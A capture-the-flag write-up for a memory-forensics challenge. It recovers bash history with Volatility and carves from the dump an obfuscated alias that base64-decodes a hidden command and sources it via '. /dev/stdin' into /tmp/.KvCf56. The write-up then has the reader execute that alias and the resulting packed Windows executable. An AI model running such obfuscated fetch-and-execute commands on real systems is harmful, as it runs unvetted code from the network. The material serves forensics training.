Memdump (400)

Question:

We were trying to capture the flag too! But that's what it left for us.

memdump.xz

Write-Up:

Decompress the given xz file:

unxz memdump.xz

Identify the profile of the given image:

volatility -f memdump imageinfo

which outputs:

Suggested Profile(s) : No suggestion (Instantiated with Linux_Ubuntu_Raring_13_04-desktop-amd64_kernel-3_8_0-35-generic_x64)
             AS Layer1 : FileAddressSpace (/home/user1/memdump)
              PAE type : No PAE
                   DTB : 0x1c0d000L

Nothing! Zilch!

So, open the file in a hex editor and look for well-known OS names.

Ubuntu can be spotted easily, and with a little more searching you can also find that the kernel version is 3.13.1 and the architecture is x64.

Download Ubuntu 8 x64 profiles from Volatility Foundation Profiles.

Put them in Volatility's plugin directory:

/usr/lib/python2.7/dist-packages/volatility/plugins/overlays/linux/

List the Volatility profiles for Ubuntu:

volatility --plugins=tools/linux --info | grep -i Ubuntu

which outputs:

LinuxUbuntu1404x64                                                   - A Profile for Linux Ubuntu1404 x64
Linux_Ubuntu_Precise_12_04-desktop-amd64_kernel-3_8_0-29-generic_x64 - A Profile for Linux _Ubuntu_Precise_12.04-desktop-amd64_kernel-3.8.0-29-generic_ x64
Linux_Ubuntu_Precise_12_04-desktop-i386_kernel-3_8_0-29-generic_x86  - A Profile for Linux _Ubuntu_Precise_12.04-desktop-i386_kernel-3.8.0-29-generic_ x86
Linux_Ubuntu_Quantal_12_10-desktop-amd64_kernel-3_5_0-45-generic_x64 - A Profile for Linux _Ubuntu_Quantal_12.10-desktop-amd64_kernel-3.5.0-45-generic_ x64
Linux_Ubuntu_Raring_13_04-desktop-amd64_kernel-3_8_0-35-generic_x64  - A Profile for Linux _Ubuntu_Raring_13.04-desktop-amd64_kernel-3.8.0-35-generic_ x64
Linux_Ubuntu_Raring_13_04-desktop-i386_kernel-3_8_0-35-generic_x86   - A Profile for Linux _Ubuntu_Raring_13.04-desktop-i386_kernel-3.8.0-35-generic_ x86
Linux_Ubuntu_Saucy_13_10-desktop-amd64_kernel-3_11_0-15-generic_x64  - A Profile for Linux _Ubuntu_Saucy_13.10-desktop-amd64_kernel-3.11.0-15-generic_ x64
Linux_Ubuntu_Saucy_13_10-desktop-i386_kernel-3_11_0-15-generic_x86   - A Profile for Linux _Ubuntu_Saucy_13.10-desktop-i386_kernel-3.11.0-15-generic_ x86

Next, use the generic LinuxUbuntu1404x64 profile to recover the bash history from the dump:

volatility -f memdump --profile LinuxUbuntu1404x64 linux_bash

which outputs:

Pid      Name                 Command Time                   Command
-------- -------------------- ------------------------------ -------
    1136 bash                 2016-02-03 11:31:37 UTC+0000   netstat -natp
    1136 bash                 2016-02-03 11:32:21 UTC+0000   history
    1136 bash                 2016-02-03 11:32:28 UTC+0000   startx
    1136 bash                 2016-02-03 11:32:35 UTC+0000   history
    1136 bash                 2016-02-03 11:32:55 UTC+0000   passwd
    1136 bash                 2016-02-03 11:33:31 UTC+0000   ifconfig
    1136 bash                 2016-02-03 11:33:37 UTC+0000   curl ctf.sharif.edu
    1136 bash                 2016-02-03 11:33:43 UTC+0000   curl ctf.sharif.edu | grep till
    1136 bash                 2016-02-03 11:33:49 UTC+0000   curl -s paste.debian.net/plain/343376 | cut -d "_not"
    1136 bash                 2016-02-03 11:34:11 UTC+0000   curl -s paste.debian.net/plain/343376 | tr -d "_not"
    1136 bash                 2016-02-03 11:34:51 UTC+0000   curl -s paste.debian.net/plain/343376 | base64 | rev
    1136 bash                 2016-02-03 11:34:58 UTC+0000   top
    1136 bash                 2016-02-03 11:35:04 UTC+0000   history
    1136 bash                 2016-02-03 11:35:09 UTC+0000   curl -s ctf.sharif.edu | grep till
    1136 bash                 2016-02-03 11:35:15 UTC+0000   curl -s ctf.sharif.edu | grep till | sed -e 's/20:00/30:00/g'
    1136 bash                 2016-02-03 11:35:22 UTC+0000   blahblah
    1136 bash                 2016-02-03 11:35:29 UTC+0000   echo blahblah
    1136 bash                 2016-02-03 11:35:35 UTC+0000   curl -I ctf.sharif.edu
    1136 bash                 2016-02-03 11:35:42 UTC+0000   curl -I ctf.sharif.edu | grep ETag | cut -d "\"" -f2
    1136 bash                 2016-02-03 11:35:48 UTC+0000   curl -s -I ctf.sharif.edu | grep ETag | cut -d "\"" -f2
    1136 bash                 2016-02-03 11:35:53 UTC+0000   curl ctftime.org
    1136 bash                 2016-02-03 11:36:05 UTC+0000   curl https://ctftime.org
    1136 bash                 2016-02-03 11:36:11 UTC+0000   curl https://ctftime.org/upcoming | grep -i SharifCTF
    1136 bash                 2016-02-03 11:36:17 UTC+0000   curl -s "https://ctftime.org/upcoming " | grep -i SharifCTF
    1136 bash                 2016-02-03 11:36:23 UTC+0000   curl -s "https://ctftime.org/upcoming " | grep -i flag
    1136 bash                 2016-02-03 11:36:35 UTC+0000   echo "woow :) :)"
    1136 bash                 2016-02-03 11:36:41 UTC+0000   watch curl -s "https://ctftime.org/Upcoming | grep -i flag"
    1136 bash                 2016-02-03 11:37:00 UTC+0000   history
    1136 bash                 2016-02-03 11:37:05 UTC+0000   ping google.com
    1136 bash                 2016-02-03 11:37:13 UTC+0000   ps aux
    1136 bash                 2016-02-03 11:37:19 UTC+0000   nslookup ctf.sharif.edu
    1136 bash                 2016-02-03 11:37:24 UTC+0000   ls -ah
    1136 bash                 2016-02-03 11:37:29 UTC+0000   ls -la
    1136 bash                 2016-02-03 11:37:33 UTC+0000   uptime
    1136 bash                 2016-02-03 11:37:40 UTC+0000   clear

Try to find the blahblah process so we can delve into its address space:

volatility -f memdump --profile LinuxUbuntu1404x64 linux_pslist

Output:

Offset             Name                 Pid             Uid             Gid    DTB                Start Time
------------------ -------------------- --------------- --------------- ------ ------------------ ----------
0xffff880005990000 init                 1               184466...723524 18...8 0x0000000005bfe000 2016-02-03 11:29:26 UTC+0000
0xffff880005990a30 kthreadd             2               184466...532164 18...8 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff880005991460 ksoftirqd/0          3               184466...532356 18...0 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff8800059928c0 kworker/0:0H         5               184466...533124 18...8 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff8800059932f0 kworker/u2:0         6               184466...533508 18...2 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff880005993d20 rcu_sched            7               184466...533700 18...4 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff880005994750 rcuos/0              8               184466...533892 18...6 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff880005995180 rcu_bh               9               184466...652356 18...0 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff880005995bb0 rcuob/0              10              184466...652548 18...2 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff8800059965e0 migration/0          11              184466...652740 18...4 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff880005997010 watchdog/0           12              184466...653508 18...2 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff8800059f0000 khelper              13              184466...653892 18...6 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff8800059f0a30 kdevtmpfs            14              184466...654084 18...8 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff8800059f1460 netns                15              184466...909188 18...2 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff8800059f1e90 khungtaskd           16              184466...150852 18...6 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff8800059f28c0 writeback            17              184466...151236 18...0 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff8800059f32f0 ksmd                 18              184466...303428 18...2 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff8800059f3d20 crypto               19              184466...303812 18...6 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff8800059f4750 kintegrityd          20              184466...304196 18...0 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff8800059f5180 bioset               21              184466...304580 18...4 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff8800059f5bb0 kblockd              22              184466...305348 18...2 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff8800059f65e0 ata_sff              23              184466...892612 18...6 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff8800059f7010 khubd                24              184466...922308 18...2 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff880005b58000 md                   25              184466...923076 18...0 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff880005b58a30 devfreq_wq           26              184466...923652 18...6 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff880005b59460 kworker/u2:1         27              184466...512324 18...8 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff880005b59e90 kworker/0:1          28              184466...188996 18...0 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff880005b5a8c0 kswapd0              29              184466...108036 18...0 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff880005b5b2f0 fsnotify_mark        30              184466...109380 18...4 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff880005b5bd20 ecryptfs-kthrea      31              184466...109956 18...0 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff880005c53d20 kthrotld             43              184466...209796 18...0 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff880005c54750 acpi_thermal_pm      44              184466...133124 18...8 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff880005c532f0 scsi_eh_0            45              184466...359108 18...2 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff880005c528c0 scsi_tmf_0           46              184466...359492 18...6 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff880005c51e90 scsi_eh_1            47              184466...360068 18...2 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff880005c51460 scsi_tmf_1           48              184466...360452 18...6 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff880005c50000 ipv6_addrconf        50              184466...544324 18...8 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff880006c29e90 deferwq              70              184466...720260 18...4 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff880006c29460 charger_manager      71              184466...720644 18...8 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff880006c2f010 kpsmoused            117             184466...099588 18...2 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff880006c2bd20 kworker/0:2          118             184466...101892 18...6 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff880005c565e0 scsi_eh_2            119             184466...420548 18...2 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff880005c55bb0 scsi_tmf_2           120             184466...420164 18...8 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff880005c57010 kworker/0:1H         121             184466...419588 18...2 ------------------ 2016-02-03 11:29:26 UTC+0000
0xffff880006f08000 jbd2/sda1-8          131             184466...455044 18...8 ------------------ 2016-02-03 11:29:27 UTC+0000
0xffff880006f09e90 ext4-rsv-conver      132             184466...453892 18...6 ------------------ 2016-02-03 11:29:27 UTC+0000
0xffff880002921460 upstart-udev-br      264             184466...017668 18...2 0x0000000002917000 2016-02-03 11:29:31 UTC+0000
0xffff880002920000 systemd-udevd        270             184466...644356 18...0 0x0000000002930000 2016-02-03 11:29:31 UTC+0000
0xffff880004d37010 upstart-file-br      391             184466...970308 18...2 0x0000000004d42000 2016-02-03 11:29:32 UTC+0000
0xffff880004d31e90 dbus-daemon          394             184466...170372 18...6 0x0000000000562000 2016-02-03 11:29:33 UTC+0000
0xffff880004d365e0 rsyslogd             396             184466...121476 18...0 0x0000000004df7000 2016-02-03 11:29:33 UTC+0000
0xffff880006c28a30 systemd-logind       422             184466...123012 18...6 0x0000000004d27000 2016-02-03 11:29:33 UTC+0000
0xffff880004d35bb0 upstart-socket-      462             184466...849988 18...2 0x0000000000558000 2016-02-03 11:29:34 UTC+0000
0xffff880004e21e90 dhclient             540             184466...335364 18...8 0x00000000078ac000 2016-02-03 11:29:34 UTC+0000
0xffff880004e265e0 getty                680             184466...711492 18...6 0x0000000004d52000 2016-02-03 11:29:35 UTC+0000
0xffff880004e25bb0 getty                683             184466...969540 18...4 0x0000000004ee1000 2016-02-03 11:29:35 UTC+0000
0xffff880006c2c750 getty                690             184466...641988 18...2 0x000000000379b000 2016-02-03 11:29:35 UTC+0000
0xffff880006c2e5e0 getty                691             184466...699844 18...8 0x00000000037ab000 2016-02-03 11:29:35 UTC+0000
0xffff880006f0e5e0 getty                693             184466...645700 18...4 0x00000000037e5000 2016-02-03 11:29:35 UTC+0000
0xffff880003171e90 acpid                710             184466...780676 18...0 0x00000000037f6000 2016-02-03 11:29:35 UTC+0000
0xffff8800029265e0 sshd                 725             184466...387780 18...4 0x00000000005e4000 2016-02-03 11:29:35 UTC+0000
0xffff880002f6f010 atd                  773             184466...347524 18...8 0x00000000030be000 2016-02-03 11:29:35 UTC+0000
0xffff880002f6d180 cron                 774             184466...169028 18...2 0x00000000037f2000 2016-02-03 11:29:35 UTC+0000
0xffff880005b5f010 kauditd              900             184466...864196 18...0 ------------------ 2016-02-03 11:29:50 UTC+0000
0xffff880004e25180 getty                1047            184466...708868 18...2 0x0000000003131000 2016-02-03 11:31:09 UTC+0000
0xffff880005b5dbb0 sshd                 1093            184466...922436 18...0 0x0000000004fa7000 2016-02-03 11:31:34 UTC+0000
0xffff880006f08a30 sshd                 1135            184466...849412 18...6 0x000000000307b000 2016-02-03 11:31:36 UTC+0000
0xffff880006f0dbb0 bash                 1136            184466...902404 18...8 0x0000000000159000 2016-02-03 11:31:36 UTC+0000
0xffff880005b5e5e0 kworker/u2:2         1166            184466...788612 18...6 ------------------ 2016-02-03 11:34:35 UTC+0000

No such process is found! Perhaps blahblah was an alias.

In the hex editor, search for blahblah=, but you won't find anything! It is possible that this portion of memory was partly overwritten by other data.

If you search the dump for the commands that linux_bash recovered (see above), you'll eventually come upon a region like this:

6CDBC1D     00 00 00 68 69 73 74 6f  72 79 0d 70 69 6e 67 20  67 6f 6f 67 6c 65 2e 63  6f 6d 0d 03 70   ...history.ping google.com..p
6CDBC3A     73 20 61 75 78 0d 6e 73  6c 6f 6f 6b 75 70 20 63  74 66 2e 73 68 61 72 69  66 2e 65 64 75   s aux.nslookup ctf.sharif.edu
6CDBC57     0d 6c 73 20 2d 61 68 0d  6c 73 20 2d 6c 61 0d 75  70 74 69 6d 65 0d 63 6c  65 61 72 0d 68   .ls -ah.ls -la.uptime.clear.h
6CDBC74     62 6c 61 68 3d 27 65 63  68 6f 20 3d 6f 77 59 31  4a 48 62 67 30 79 63 67  67 47 64 30 42   blah='echo =owY1JHbg0ycggGd0B
6CDBC91     6e 4f 76 38 53 4e 30 34  53 4d 34 4d 6a 4c 31 4d  6a 4c 31 49 7a 4c 71 74  30 54 77 46 33   nOv8SN04SM4MjL1MjL1IzLqt0TwF3
6CDBCAE     62 20 7c 20 72 65 76 20  7c 20 6f 70 65 6e 73 73  6c 20 65 6e 63 20 2d 61  20 2d 64 20 7c   b | rev | openssl enc -a -d |
6CDBCCB     20 72 65 76 20 7c 20 2e  20 2f 64 65 76 2f 73 74  64 69 6e 20 3e 20 2f 74  6d 70 2f 2e 4b    rev | . /dev/stdin > /tmp/.K
6CDBCE8     76 43 66 35 36 27 0d 68  69 73 74 6f 72 79 0d 70  61 73 73 77 64 0d 0d 69  66 63 6f 6e 66   vCf56'.history.passwd..ifconf
6CDBD05     69 67 0d 63 75 72 6c 20  63 74 66 2e 73 68 61 72  69 66 2e 65 64 75 0d 63  75 72 6c 20 63   ig.curl ctf.sharif.edu.curl c
6CDBD22     74 66 2e 73 68 61 72 69  66 2e 65 64 75 20 7c 20  67 72 65 70 20 74 69 6c  6c 0d 63 75 72   tf.sharif.edu | grep till.cur
6CDBD3F     6c 20 2d 73 20 70 61 73  74 65 2e 64 65 62 69 61  6e 2e 6e 65 74 2f 70 6c  61 69 6e 2f 33   l -s paste.debian.net/plain/3
6CDBD5C     34 33 33 37 36 20 7c 20  63 75 74 20 2d 64 20 22  5f 6e 6f 74 22 0d 0d 63  75 72 6c 20 2d   43376 | cut -d "_not"..curl -
6CDBD79     73 20 70 61 73 74 65 2e  64 65 62 69 61 6e 2e 6e  65 74 2f 70 6c 61 69 6e  2f 33 34 33 33   s paste.debian.net/plain/3433
6CDBD96     37 36 20 7c 20 74 72 20  2d 64 20 22 5f 6e 6f 74  22 0d 63 75 72 6c 20 2d  73 20 70 61 73   76 | tr -d "_not".curl -s pas
6CDBDB3     74 65 2e 64 65 62 69 61  6e 2e 6e 65 74 2f 70 6c  61 69 6e 2f 33 34 33 33  37 36 20 7c 20   te.debian.net/plain/343376 |
6CDBDD0     62 61 73 65 36 34 20 7c  20 72 65 76 0d 74 6f 70  0d 71 68 69 73 74 6f 72  79 0d 63 75 72   base64 | rev.top.qhistory.cur
6CDBDED     6c 20 2d 73 20 63 74 66  2e 73 68 61 72 69 66 2e  65 64 75 20 7c 20 67 72  65 70 20 74 69   l -s ctf.sharif.edu | grep ti
6CDBE0A     6c 6c 0d 10 00 00 00 20  5f 00 00 00 00 00 00 10  00 00 00 00 00 00 c0 00  01 00 00 ea ff   ll..... _....................

Looking carefully, the following snippet stands out:

.hblah='echo =owY1JHbg0ycggGd0BnOv8SN04SM4MjL1MjL1IzLqt0TwF3b | rev | openssl enc -a -d | rev | . /dev/stdin > /tmp/.KvCf56'

Obviously, the beginning of blahblah= was overwritten and only hblah= remains. But, voilà, we now know how the alias blahblah was defined!

Now run the following:

alias blahblah='echo =owY1JHbg0ycggGd0BnOv8SN04SM4MjL1MjL1IzLqt0TwF3b | rev | openssl enc -a -d | rev | . /dev/stdin > /tmp/.KvCf56'

blahblah

file /tmp/.KvCf56

which outputs:

/tmp/.KvCf56: PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
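An added example, not part of the original write-up, that performs the last two steps offline: it carves alias-style definitions out of a constructed slice of memory mirroring the hex dump above, then evaluates the echo | rev | openssl enc -a -d | rev stage in Python to reveal what . /dev/stdin would have executed, without running anything. The sample bytes and the function names are constructed for this example.

```python
import base64
import re

# Constructed sample: a slice of memory mimicking the bash-history residue in the
# write-up's hex dump (commands separated by 0x0d, and the "blahblah=" alias
# definition whose first bytes were overwritten, leaving only "hblah=").
SAMPLE_DUMP = (
    b"\x00\x00\x00history\rping google.com\r\x03ps aux\rls -ah\ruptime\rclear\r"
    b"hblah='echo =owY1JHbg0ycggGd0BnOv8SN04SM4MjL1MjL1IzLqt0TwF3b | rev"
    b" | openssl enc -a -d | rev | . /dev/stdin > /tmp/.KvCf56'\r"
    b"history\rpasswd\r\rifconfig\rcurl ctf.sharif.edu\r"
    b"\x10\x00\x00\x00 _\x00\x00\x00"
)

# NAME='...' or NAME="..." embedded in the history stream; NAME may be truncated
# when the bytes before it were overwritten, as happened here.
ALIAS_RE = re.compile(rb"([A-Za-z_][A-Za-z0-9_]*)=(['\"])([^'\"\x00\r\n]{1,512})\2")

# The obfuscation stage used by the alias: echo X | rev | openssl enc -a -d | rev
ECHO_REV_RE = re.compile(r"echo\s+(\S+)\s*\|\s*rev\s*\|\s*openssl enc -a -d\s*\|\s*rev")


def carve_aliases(dump: bytes):
    """Return (offset, name, body) for every alias-style definition found in the dump."""
    return [(m.start(), m.group(1).decode("ascii"), m.group(3).decode("latin-1"))
            for m in ALIAS_RE.finditer(dump)]


def rev(text: str) -> str:
    """Emulate coreutils rev: reverse each line, keeping the line structure."""
    return "\n".join(line[::-1] for line in text.split("\n"))


def decode_alias_payload(body: str):
    """Statically evaluate the echo|rev|openssl enc -a -d|rev stage of an alias body.

    Returns the lines the shell would have sourced via '. /dev/stdin'.
    """
    m = ECHO_REV_RE.search(body)
    if not m:
        raise ValueError("alias body has no echo|rev|openssl enc -a -d|rev stage")
    b64 = rev(m.group(1) + "\n")                     # echo adds a newline; first rev
    plain = base64.b64decode(b64).decode("latin-1")  # openssl enc -a -d == base64 decode
    return [line for line in rev(plain).split("\n") if line]  # second rev


if __name__ == "__main__":
    for offset, name, body in carve_aliases(SAMPLE_DUMP):
        print(f"offset {offset:#x}: alias {name}= ...")
        for line in decode_alias_payload(body):
            print("  would execute:", line)
```

Running the block shows that the alias only downloads a file with curl and stores it as /tmp/.KvCf56, which is the PE analysed next; the carver can be pointed at the whole memdump with open("memdump", "rb").read().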

So we are dealing with a Windows executable (a PE file). Running it under Windows gives the following output:

I'm not the flag, but I may know it!

So, the flag is somewhere in this file.

Use PEiD to find out that the file is packed with ASPack.

Unpack the file with your unpacker of choice (I used FUU).

Check out the resource section of the unpacked PE file (say, with the PEiD resource viewer plugin).

You'll see a resource category called flag, containing a PNG file:

Save and open the PNG file. Here is the flag (it must be flipped horizontally to be readable):